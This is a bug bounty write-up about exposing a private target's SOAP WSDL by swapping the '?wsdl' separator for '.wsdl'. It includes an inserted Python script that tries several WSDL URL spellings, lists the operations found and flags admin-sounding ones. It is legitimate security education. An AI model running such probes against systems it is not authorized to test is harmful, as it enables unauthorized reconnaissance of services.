A small change, and things fall into your hands: story of a $250 bounty
--
Hi there,
This write-up is about how a small change fetched me $250 in security research. Let's start the story.
Some days back, I joined Bugcrowd and quickly got addicted to it because of the fast response and the acceptance of bugs according to severity (unlike HackerOne, whose triage system is good but whose response time is quite slow, simply because a huge number of people are over there).
Check out Bugcrowd:
The target was a private program, so I won't disclose it in public; I'll use https://example.com/ as a stand-in for the target and the attacks that follow.
When I got the target, I learned some basic things about it by spidering the site in Burp Suite. For those who don't know about spidering in Burp Suite, the link is here:
After spidering the website, I found an endpoint like this:
-> https://example.com/exemted_file?wsdl
WSDL (Web Services Description Language) is an XML format that describes the functionality a web service offers: the operations it exposes, the messages they take, and the address they are served from. From an attacker's point of view it is a map of the service's API surface, including operations that were only ever meant for administrators (this is how I understood it for attack purposes).
In my previous write-up, I shared how a small manipulation earned me an appreciation from the organization. If you wish to read it, here is the link:
So, let's proceed. Using the same manipulation technique, I inspected the URL:
-> https://example.com/exemted_file-wsdl
Interestingly, the browser showed "Page not found", but in Burp Suite the request completed successfully. After intercepting it during live interception, I concluded that something was off.
What was off: the response was being loaded, but it was not rendered in the browser. I read up on WSDL, how it is implemented and what harm a person can do with it (in my terms, "reversing the work").
Learn about WSDL:
Harmful things == great things (for me)
I found out that WSDL handling has some issues with how the separator symbol is treated. (The reason was not clear to me either, so I tried an example to see.) In simple words: `?wsdl` is a query string, so the request goes to the service handler, which decides whether to return its description; `.wsdl` is a path, so the request goes to whatever serves files at that path. The two are routed, and access-controlled, differently, which is why changing the separator changed the response from "Page not found" to something else.
So, I simply changed it like this:
-> https://example.com/exemted_file-wsdl (previous request)
-> https://example.com/exemted_file.wsdl (changed "?", then "-", to ".")
And seriously, it revealed everything: the admin-level operations in the portal, and the endpoints that were available to call. I tried to escalate it, but it was not worth it, because every endpoint was blocked.
FYI, the operations that were exposed belonged to a SOAP API, so the finding itself was information disclosure of the API surface, not the ability to call it.
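To make the two points above concrete (what a WSDL tells an attacker, and why `?wsdl` and `.wsdl` can behave differently), here is an added example of the probe I would script for this; it is not the author's code or tooling. It goes a little beyond the write-up by trying several spellings of the WSDL request rather than just two. The base URL, the `/exemted_file` path, the fetch helper and the sample WSDL are all assumptions or constructed for demonstration; the constructed `fake_fetch` mimics the behaviour the write-up describes (the `.wsdl` spelling answers, the others do not) so the script runs offline.

```python
"""Probe a SOAP endpoint for its WSDL under several URL spellings and
enumerate the operations the description exposes.

Added example for this write-up, not the author's code. The target URL,
the fetch helper and SAMPLE_WSDL are assumptions / constructed data.
"""
import urllib.error
import urllib.request
from urllib.parse import urlsplit, urlunsplit
import xml.etree.ElementTree as ET

WSDL_NS = "http://schemas.xmlsoap.org/wsdl/"
SOAP_NS = "http://schemas.xmlsoap.org/wsdl/soap/"

# Substrings that suggest an operation was meant for privileged callers.
SENSITIVE = ("admin", "delete", "reset", "config", "export", "impersonat")


def wsdl_variants(base_url):
    """Spellings of a WSDL request worth trying for one service endpoint.

    '?wsdl' asks the service handler for its description; '<path>.wsdl'
    asks the server for a file at that path. They are routed differently,
    so a block applied to one does not necessarily cover the other.
    """
    parts = urlsplit(base_url)
    path = parts.path.rstrip("/") or "/"
    candidates = [
        urlunsplit(parts._replace(query="wsdl")),
        urlunsplit(parts._replace(query="WSDL")),
        urlunsplit(parts._replace(path=path + ".wsdl", query="")),
        urlunsplit(parts._replace(path=path + "-wsdl", query="")),
        urlunsplit(parts._replace(path=path + "/wsdl", query="")),
    ]
    seen, out = set(), []          # deduplicate, keep order
    for c in candidates:
        if c not in seen:
            seen.add(c)
            out.append(c)
    return out


def http_fetch(url, timeout=10):
    """Default fetcher: GET the URL and return (status, body_text)."""
    req = urllib.request.Request(url, headers={"User-Agent": "wsdl-probe"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode("utf-8", "replace")


def looks_like_wsdl(body):
    """Cheap check that a body is a WSDL document and not an error page."""
    return "<definitions" in body or ":definitions" in body


def probe(base_url, fetch=http_fetch):
    """Try every variant; return a list of (url, status, is_wsdl)."""
    results = []
    for url in wsdl_variants(base_url):
        status, body = fetch(url)
        results.append((url, status, status == 200 and looks_like_wsdl(body)))
    return results


def parse_wsdl(xml_text):
    """Return the SOAP endpoint addresses and (portType, operation) pairs."""
    root = ET.fromstring(xml_text)
    ops = []
    for pt in root.iter("{%s}portType" % WSDL_NS):
        for op in pt.findall("{%s}operation" % WSDL_NS):
            ops.append((pt.get("name"), op.get("name")))
    endpoints = [a.get("location") for a in root.iter("{%s}address" % SOAP_NS)]
    return {"endpoints": endpoints, "operations": ops}


def sensitive_operations(parsed):
    """Operations whose names suggest admin-only functionality."""
    return [op for _, op in parsed["operations"]
            if any(k in op.lower() for k in SENSITIVE)]


# Constructed sample WSDL (not from the real target).
SAMPLE_WSDL = """<?xml version="1.0"?>
<definitions name="Portal" xmlns="http://schemas.xmlsoap.org/wsdl/"
    xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/">
  <portType name="PortalPort">
    <operation name="GetProfile"/>
    <operation name="AdminResetPassword"/>
    <operation name="ExportAllUsers"/>
  </portType>
  <service name="Portal">
    <port name="PortalPort" binding="tns:PortalBinding">
      <soap:address location="https://example.com/exemted_file"/>
    </port>
  </service>
</definitions>
"""


def fake_fetch(url):
    """Constructed offline stand-in for http_fetch, mimicking the write-up:
    the query-string form is refused (assumed 403), the '-wsdl' and other
    spellings are not found, and only the '.wsdl' path returns the WSDL."""
    if url.endswith("?wsdl") or url.endswith("?WSDL"):
        return 403, "Forbidden"
    if url.endswith(".wsdl"):
        return 200, SAMPLE_WSDL
    return 404, "Page not found"


if __name__ == "__main__":
    for url, status, ok in probe("https://example.com/exemted_file", fetch=fake_fetch):
        print(status, "WSDL" if ok else "-", url)
    found = parse_wsdl(SAMPLE_WSDL)
    print("endpoints:", found["endpoints"])
    print("sensitive operations:", sensitive_operations(found))
```

Against a live target, call `probe(url)` without the `fetch` argument to use the real HTTP fetcher. Getting the WSDL back is only the start: the operations list tells you what to try, and the bounty-relevant question is whether any of the sensitive-looking operations can actually be invoked without authorization, which in the author's case they could not.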
They responded in the best way possible: fast, smooth and, interestingly, great. And they awarded me a bounty of $250. It felt good to get a bounty after quite a while (I spent one full day searching for this).
Tip: for each endpoint, work out what purpose it serves. That will give you the best answer: "a small loophole in the functionality."
Google it, and your hands will be filled with a great bug!
I hope you got what I shared, and if it feels right to share it with others, do that too. Thanks for reading.
===========Happy Hacking===========